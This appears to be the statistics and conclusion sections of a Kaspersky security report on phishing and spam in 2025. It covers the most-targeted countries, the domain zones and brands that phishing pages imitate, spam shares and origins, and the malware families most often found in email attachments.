The phishing and scam landscape underwent a shift. While in 2024, we saw a high volume of mass attacks, their frequency declined in 2025. Furthermore, redirection-based schemes, which were frequently used for online fraud in 2024, became less prevalent in 2025.

Map of phishing attacks

As in the previous year, Peru remains the country with the highest percentage (17.46%) of users targeted by phishing attacks. Bangladesh (16.98%) took second place, entering the TOP 10 for the first time, while Malawi (16.65%), which was absent from the 2024 rankings, was third. Following these are Tunisia (16.19%), Colombia (15.67%), the latter also being a newcomer to the TOP 10, Brazil (15.48%), and Ecuador (15.27%). They are followed closely by Madagascar and Kenya, both with a 15.23% share of attacked users. Rounding out the list is Vietnam, which previously held the third spot, with a share of 15.05%.

Country/territory Share of attacked users**
Peru 17.46%
Bangladesh 16.98%
Malawi 16.65%
Tunisia 16.19%
Colombia 15.67%
Brazil 15.48%
Ecuador 15.27%
Madagascar 15.23%
Kenya 15.23%
Vietnam 15.05%

** Share of users who encountered phishing out of the total number of Kaspersky users in the country/territory, 2025

Top-level domains

In 2025, breaking a trend that had persisted for several years, the majority of phishing pages were hosted within the XYZ TLD zone, accounting for 21.64% – a three-fold increase compared to 2024. The second most popular zone was TOP (15.45%), followed by BUZZ (13.58%). This high demand can be attributed to the low cost of domain registration in these zones. The COM domain, which had previously held the top spot consistently, fell to fourth place (10.52%). It is important to note that this decline is partially driven by the popularity of typosquatting attacks: threat actors frequently spoof sites within the COM domain by using alternative suffixes, such as example-com.site instead of example.com. Following COM is the BOND TLD, entering the TOP 10 for the first time with a 5.56% share. As this zone is typically associated with financial websites, the surge in malicious interest there is a logical progression for financial phishing. The sixth and seventh positions are held by ONLINE (3.39%) and SITE (2.02%), which occupied the fourth and fifth spots, respectively, in 2024. In addition, three domain zones that had not previously appeared in our statistics emerged as popular hosting environments for phishing sites. These included the CFD domain (1.97%), typically used for websites in the clothing, fashion, and design sectors; the Polish national top-level domain, PL (1.75%); and the LOL domain (1.60%).

Most frequent top-level domains for phishing pages, 2025 (download)

Organizations targeted by phishing attacks

The rankings of organizations targeted by phishers are based on detections by the Anti-Phishing deterministic component on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

Phishing pages impersonating web services (27.42%) and global internet portals (15.89%) maintained their positions in the TOP 10, continuing to rank first and second, respectively. Online stores (11.27%), a traditional favorite among threat actors, returned to the third spot. In 2025, phishers showed increased interest in online gamers: websites mimicking gaming platforms jumped from ninth to fifth place (7.58%). These are followed by banks (6.06%), payment systems (5.93%), messengers (5.70%), and delivery services (5.06%). Phishing attacks also targeted social media (4.42%) and government services (1.77%) accounts.

Distribution of targeted organizations by category, 2025 (download)

Statistics: spam

Share of spam in email traffic

In 2025, the average share of spam in global email traffic was 44.99%, representing a decrease of 2.28 percentage points compared to the previous year. Notably, contrary to the trends of the past several years, the fourth quarter was the busiest one: an average of 49.26% of emails were categorized as spam, with peak activity occurring in November (52.87%) and December (51.80%). Throughout the rest of the year, the distribution of junk mail remained relatively stable without significant spikes, maintaining an average share of approximately 43.50%.

Share of spam in global email traffic, 2025 (download)

In the Russian web segment (Runet), we observed a more substantial decline: the average share of spam decreased by 5.3 percentage points to 43.27%. Deviating from the global trend, the fourth quarter was the quietest period in Russia, with a share of 41.28%. We recorded the lowest level of spam activity in December, when only 36.49% of emails were identified as junk. January and February were also relatively calm, with average values of 41.94% and 43.09%, respectively. Conversely, the Runet figures for March–October correlated with global figures: no major surges were observed, spam accounting for an average of 44.30% of total email traffic during these months.

Share of spam in Runet email traffic, 2025 (download)

Countries and territories where spam originated

The top three countries in the 2025 rankings for the volume of outgoing spam mirror the distribution of the previous year: Russia, China, and the United States. However, the share of spam originating from Russia decreased from 36.18% to 32.50%, while the shares of China (19.10%) and the U.S. (10.57%) each increased by approximately 2 percentage points. Germany rose to fourth place (3.46%), up from sixth last year, displacing Kazakhstan (2.89%). Hong Kong followed in sixth place (2.11%). The Netherlands and Japan shared the next spot with identical shares of 1.95%; however, we observed a year-over-year increase in outgoing spam from the Netherlands, whereas Japan saw a decline. The TOP 10 is rounded out by Brazil (1.94%) and Belarus (1.74%), the latter ranking for the first time.

TOP 20 countries and territories where spam originated in 2025 (download)

Malicious email attachments

In 2025, Kaspersky solutions blocked 144,722,674 malicious email attachments, an increase of nineteen million compared to the previous year. The beginning and end of the year were traditionally the most stable periods; however, we also observed a notable decline in activity during August and September. Peaks in email antivirus detections occurred in June, July, and November.

Email antivirus detections, 2025 (download)

The most prevalent malicious email attachment in 2025 was the Makoob Trojan family, which covertly harvests system information and user credentials. Makoob first entered the TOP 10 in 2023 in eighth place, rose to third in 2024, and secured the top spot in 2025 with a share of 4.88%. Following Makoob, as in the previous year, was the Badun Trojan family (4.13%), which typically disguises itself as electronic documents. The third spot is held by the Taskun family (3.68%), which creates malicious scheduled tasks, followed by Agensla stealers (3.16%), which were the most common malicious attachments in 2024. Next are Trojan.Win32.AutoItScript scripts (2.88%), appearing in the rankings for the first time. In sixth place is the Noon spyware for all Windows systems (2.63%), which also occupied the tenth spot with its variant specifically targeting 32-bit systems (1.10%). Rounding out the TOP 10 are Hoax.HTML.Phish (1.98%) phishing attachments, Guloader downloaders (1.90%) – a newcomer to the rankings – and Badur (1.56%) PDF documents containing suspicious links.

TOP 10 malware families distributed via email attachments, 2025 (download)

The distribution of specific malware samples traditionally mirrors the distribution of malware families almost exactly. The only differences are that a specific variant of the Agensla stealer ranked sixth instead of fourth (2.53%), and the Phish and Guloader samples swapped positions (1.58% and 1.78%, respectively). Rounding out the rankings in tenth place is the password stealer Trojan-PSW.MSIL.PureLogs.gen with a share of 1.02%.

TOP 10 malware samples distributed via email attachments, 2025 (download)

Countries and territories targeted by malicious mailings

The highest volume of malicious email attachments was blocked on devices belonging to users in China (13.74%). For the first time in two years, Russia dropped to second place with a share of 11.18%. Following closely behind are Mexico (8.18%) and Spain (7.70%), which swapped places compared to the previous year. Email antivirus triggers saw a slight increase in Türkiye (5.19%), which maintained its fifth-place position. Sixth and seventh places are held by Vietnam (4.14%) and Malaysia (3.70%); both countries climbed higher in the TOP 10 due to an increase in detection shares. These are followed by the UAE (3.12%), which held its position from the previous year. Italy (2.43%) and Colombia (2.07%) also entered the TOP 10 list of targets for malicious mailshots.

TOP 20 countries and territories targeted by malicious mailshots, 2025 (download)

Conclusion

2026 will undoubtedly be marked by novel methods of exploiting artificial intelligence capabilities. At the same time, messaging app credentials will remain a highly sought-after prize for threat actors. While new schemes are certain to emerge, they will likely supplement rather than replace time-tested tricks and tactics. This underscores the reality that, alongside the deployment of robust security software, users must remain vigilant and exercise extreme caution toward any online offers that raise even the slightest suspicion.

The intensified focus on government service credentials signals a rise in potential impact; unauthorized access to these services can lead to financial theft, data breaches, and full-scale identity theft. Furthermore, the increased abuse of legitimate tools and the rise of multi-stage attacks – which often begin with seemingly harmless files or links – demonstrate a concerted effort by fraudsters to lull users into a false sense of security while pursuing their malicious objectives.

  •  
❌